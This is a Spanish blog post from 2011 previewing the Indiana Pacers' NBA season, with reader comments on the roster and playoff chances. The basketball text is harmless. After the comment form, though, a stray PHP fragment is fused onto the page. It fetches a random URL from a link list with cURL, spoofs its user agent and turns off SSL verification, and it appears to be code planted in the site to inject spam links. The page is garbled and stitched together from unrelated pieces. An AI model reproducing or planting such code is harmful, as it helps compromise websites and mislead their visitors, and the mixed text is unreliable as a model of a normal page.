Indiana Pacers: Promesas del Este

20 de December de 2011 por TheDeerHunter

Iniciábamos el año pasado el curso con bastante indiferencia hacia un proyecto que parecía definitivamente estancado. La aversión al riesgo del Larry Bird GM estaba llegando a aburrir a las ovejas y desde hacía algún tiempo veníamos señalando que todos los estamentos del club parecían haber entrado en un estado de letargo. No se hacían las cosas especialmente mal, pero apenas se hacían bien para salir de una mediocridad perenne en torno al 40% de victorias. Eso sin entrar a valorar que la suerte tampoco les ha acompañado en algunos casos.

Está escrito que en sus orígenes nos parecía atractivo el proyecto con Jim O’Brien a la cabeza. Podemos jurar que en aquel momento parecía un tipo coherente, con un planteamiento baloncestístico equilibrado, vistoso y relativamente eficaz para los mimbres que heredaba. Desconocemos cuando perdió el norte. Quizás se cansó de vagar hacia ningún sitio y trató de explorar nuevos horizontes en forma de decisiones desquiciadas. El caso es que el lío que llegó a montar provocó, primero, que le mandaran a la cola del paro, y con ello, que por fin la franquicia despertara del estado de ensoñación.

El caso es que el primer gran acierto en mucho tiempo fue ascender a Frank Vogel como (interino) primer entrenador. Su mérito no sólo fue imponer la coherencia que se había perdido (en mi opinión apostando decididamente por Hansbrough, George y el propio Hibbert) logrando hacer recuperar la ilusión con decisiones casi naturales, sin aparentemente complicarse demasiado la vida. Pronto se hablaba más de su continuidad que de cualquier otra cosa y, en la cresta de la ola, lograba la postemporada, con un 50% de victorias desde su llegada. Pasar de ronda hubiera sido exigir demasiado.

Llega el verano “extralargo” y tras resolver el lockout, los “viejos” Pacers hubieran fichado algún mindundi sin arriesgar demasiado. Sin embargo resulta que empiezan a sonar con fuerza en todo tipo de quinielas llegando a hacerse con una de las piezas cotizadas aunque tampoco exenta de riesgos: David West. 20 millones en sólo dos años parece una operación casi redonda a la espera de cómo vaya a responder tras la lesión de la que sale. Como contrapartida amnistían el contrato de James Posey. Aún les sale barata la jugada. Finalmente han mandado a Brandon Rush a Golden State a cambio de Lou Admunson. Rush nunca había terminado de arrancar y tiene pendiente una sanción por consumo de sustancias prohibidas.

Nos gusta la idea de David West al lado de un hombre grande como Roy Hibbert. Tenemos ganas de ver el crecimiento de este y lo que ambos pueden beneficiarse de una sociedad de tales características. Psico-T es un recambio de gran nivel aunque veamos de algún modo cortada su progresión. Creemos que un hombre de su perfil sabrá adaptarse a su rol de segunda unidad y minutos tampoco le van a faltar. De Foster ya sabemos todo lo que va a dar y parece un perfil ideal para ese último relevo interior y por si falta algo también suman ahora a un “clon” suyo como es Amundson.

No olvidemos que barriendo el resto de minutos interiores también disponen de Pendergraph. Se trata a priori de un juego interior notable, rocoso y muy flexible tácticamente.

En las alas se comentaba que se pretendían más sorpresas, pero con lo que partían de base ya iban bastante bien servidos. No fue el curso pasado el más brillante de Danny Granger pero sigue siendo un 3 de élite y no hay razón de que no vuelva por sus fueros. Paul George, a quien se le despeja el camino con la salida de Rush, demostró cualidades el curso pasado y será aprovechable tanto de 2 como de 3. Además cuentan con un combo-guard solvente como es George Hill, conseguido la noche del draft a cambio de su elección, Kawhi Leonard.

Por pedir,  si acaso, la posición más vulnerable podría ser la de base. Darren Collison no terminó de convencer el año pasado y ni AJ Price ni Hill son directores típicos. En cualquier caso tampoco se pueden quejar.

En definitiva. Indiana parece querer volver a la palestra. Ha crecido en calidad y ambición respecto a lo del año pasado y cuentan todavía con mucho margen de mejora. El verano que viene tienen opciones de asaltar con fuerza el mercado presentando un destino atractivo para cualquier agente libre.

Quinteto: Darren Collison, George Hill Paul George, Danny Granger, David West, Roy Hibbert
6º hombre: Tyler Hansbrough

Pronóstico: Playoffs, con opciones de alcanzar segunda ronda.

Comenta

17 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Buen análisis y buen equipo el que están armando los Pacers. Los interiores Hibbert, West, Psycho-T pueden ser de los más solventes y en el exterior tienen una gente muy capaz con Granger, Hill y Collison. Deben llegar a playoffs y una vez allí dar mucha más guerra que el año pasado. Yo creo que no pasarán de ronda pues creo que Knicks, Celtics, Bulls y Heat jugarán las semis del Este pero si alguno de ellos falla ya veremos qué puede pasar.

      Citar

  2. Sancho88 dice:
    #2

    Muy buen análisis Deer. Si acaso les falla la dirección, pero hay que reconocer que ese juego interior es un lujo, se han movido bien en los despachos. A mi Collison me parece un crack en ciernes, alguien especial. No es director al estilo ortodoxo, pero es un asesino de mil pares de narices. Un base que mola cantidubi, xd. Granger ya no podrá tirarse 30 tiros por partido, veremos si sabe asumir que ahora mismo Hibbert es el líder del equipo y Hansbrough progresa mucho más que él. En mi opinión, no habrá problemas con los minutos de West y los de Psicho-T, ya que West es veterano y no se le han conocido problemas en las plantillas, es un tío muy muy profesional. Lo que hicieron entre Paul, Peja, Chandler y él hace un par de temporadas en el oeste es para recordarlo para siempre. Playoffs seguros para los Pacers. Darán guerra en cualquier eliminatoria. Puede ser que les veamos en semis de conferencia, sí. No es ninguna locura. De entrada van de ‘tapados’ frente a Bulls, Heat, Knicks, Boston; pero luego ya veremos…

      Citar

  3. rumbero dice:
    #3

    Buen análisis y buen pronóstico. Si West está bien de la rodilla tendrán un juego interior cojonudo, con muchas variantes tanto en ataque como en defensa. A ver la progresión de Hansbrough y George porque les puede dar el plus de dar más guerra en Playoffs. Y está Collison, que a mi tb me parece un jugón desde que lo descubrí en ese final de temporada con NO.

    PD: Hace unos dias sonaba M. Redd. para los Pacers. Igual ya no es el que era y no hay temporada que no se lesione, pero sería un buen refuerzo para el juego exterior.

      Citar

  4. Viva_Dirk dice:
    #4

    Va a ser muy importante como gestionen los minutos de Paul George, que es un 3 puro igual que Granger, si me apuras Granger podria jugar mas de 2 por tiro exterior. Si George se adapta bien al rol de suplente importante tienen mucho ganado, ya que el resto de jugadores son realmente muy fiables y de mucha calidad.

      Citar

  5. TheDeerHunter dice:
    #5

    Pues yo no creo que vayan a hacer a George suplente Viva. Eso ya lo intentaron el año pasado y no funcionó.
    Los Pacers comenzaron a funcionar cuando le dieron minutos al lado de Granger… aunque luego en pista el rol de cada uno desconozco cual era.

      Citar

  6. TheDeerHunter dice:
    #6

    Offtopic como una casa, pero no me resisto a compartirlo:
    http://www.jotdown.es/2011/12/drazen-petrovic-la-forja-de-un-rebelde-genial/

      Citar

  7. RSB dice:
    #7

    Uno de los grandes vencedores post-lockout, son un equipo muy interesante. Entrarán en playoff con la gorra, y seguro que con un muy buen registro, pero coincido con vosotros: hay 4 huesos en el este muy duros, y llegar a semifinales de conferencia parece una quimera. Pero si un equipo puede ponérselo difícil a estos equipos son estos Pacers.

      Citar

  8. Nacho dice:
    #8

    TheDeerHunter: Offtopic como una casa, pero no me resisto a compartirlo:http://www.jotdown.es/2011/12/drazen-petrovic-la-forja-de-un-rebelde-genial/

    Impresionante. Casi lloro. El jugador de baloncesto que más me ha marcado, el más genial, el que acendró aún más mi antimadridismo, y el que me convirtió en madridista. Como ya dije aquí hace algún año, si hubiese vivido una NBA que respetara a los europeos, hubiese sido AllStar más de una vez, y hubiese coleccionado algún anillo.

      Citar

  9. Esteban dice:
    #9

    mis pacers!! esperaba igualemnte algo mas de ellos este año, ir por un escolta, dejando a hill de sexto hombre, pero que va siguen siendo un gran equipo, en mi opinion no tienen puntos flojos, aunque tampoco sobresalen de gran manera en ninguna

    en fin, primera ronda casi asegurados, y habra q ver que puede hacer vogel y si meten una sorpresa pasando a segunda, aunque creo q no podran vencer ni a los knicks, boston, miami o chicago, los que los deja en primera ronda

    como bien dice el titulo del analisis, son aun una promesa, pueden dar el salto si collison, hill, george, tyler y hibbert dan el salto de calidad suficiente, sino seran los atlanta de los proximos años, bueno hasta pra un curto puesto pero nada mas que eso

      Citar

  10. TheDeerHunter dice:
    #10

    No lo creo. Van a tener margen salarial para parar un carro… y ya les hubiera gustado a los Hawks estos años contar con ese margen.
    Si la apuesta de este año sale medianamente bien ojito con ellos para el curso siguiente.

      Citar

  11. Viva_Dirk dice:
    #11

    TheDeerHunter:
    Pues yo no creo que vayan a hacer a George suplente Viva. Eso ya lo intentaron el año pasado y no funcionó.
    Los Pacers comenzaron a funcionar cuando le dieron minutos al lado de Granger… aunque luego en pista el rol de cada uno desconozco cual era.

    Pero si en el propio análisis tu le das como suplente ¿no? Das como escolta titular a George Hill que para mi es como debe ser.

      Citar

  12. TheDeerHunter dice:
    #12

    Viva_Dirk: Pero si en el propio análisis tu le das como suplente ¿no? Das como escolta titular a George Hill que para mi es como debe ser.

    Coñe… pues me temo que se me fue la pinza al redactarlo. Porque yo diría que el titular va a ser George (Paul) Supongo que por ahí me vino el lapsus.

      Citar

  13. German dice:
    #13

    Postemporada seguro y hasta le pondria unas fichas de avanzar a semifinales segun el cruce. Boston es mi gran incognita, cerraron bastante mal la temporada pasada despues de los trades, pero Pierce, Garnett y compañia merecen respeto

      Citar

  14. Esteban dice:
    #14

    German:
    Postemporada seguro y hasta le pondria unas fichas de avanzar a semifinales segun el cruce. Boston es mi gran incognita, cerraron bastante mal la temporada pasada despues de los trades, pero Pierce, Garnett y compañia merecen respeto

    y los hawks? crees q los pacers puedan con ellos o si los bucks vuelven a ser los de hace dos años, tienen menos que los pacers? y orlando si mantiene a howard?

    y los nets? con deron, morrow, kirilenko, humpries y lopez, creo que estan para dar batalla…

    por primera vez en muchisimos años la vara del este se ha elevado, y bastante

      Citar

  15. rojorob dice:
    #15

    ¿La vara del este se ha elevado? Mmmm…

      Citar

  16. German dice:
    #16

    Esteban: y los hawks?crees q los pacers puedan con ellos o si los bucks vuelven a ser los de hace dos años, tienen menos que los pacers? y orlando si mantiene a howard?

    y los nets? con deron, morrow, kirilenko, humpries y lopez, creo que estan para dar batalla…

    por primera vez en muchisimos años la vara del este se ha elevado, y bastante

    Creo que estos Pacers son mejores que Nets y Bucks. Orlando tarde o temprano va a traspasar a Howard en mi opinion. Atlanta si, es un equipo fuerte pero no imposible para los Pacers como seria Chicago o Miami.

      Citar

  17. Txusma dice:
    #17

    Hombre, yo creo que los Pacers son mejores que Nets y Bucks de largo y a un nivel muy parecido que los Hawks. Chicago o Miami juegan en otra liga. De hecho, me da que uno de estos dos será el campeón.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>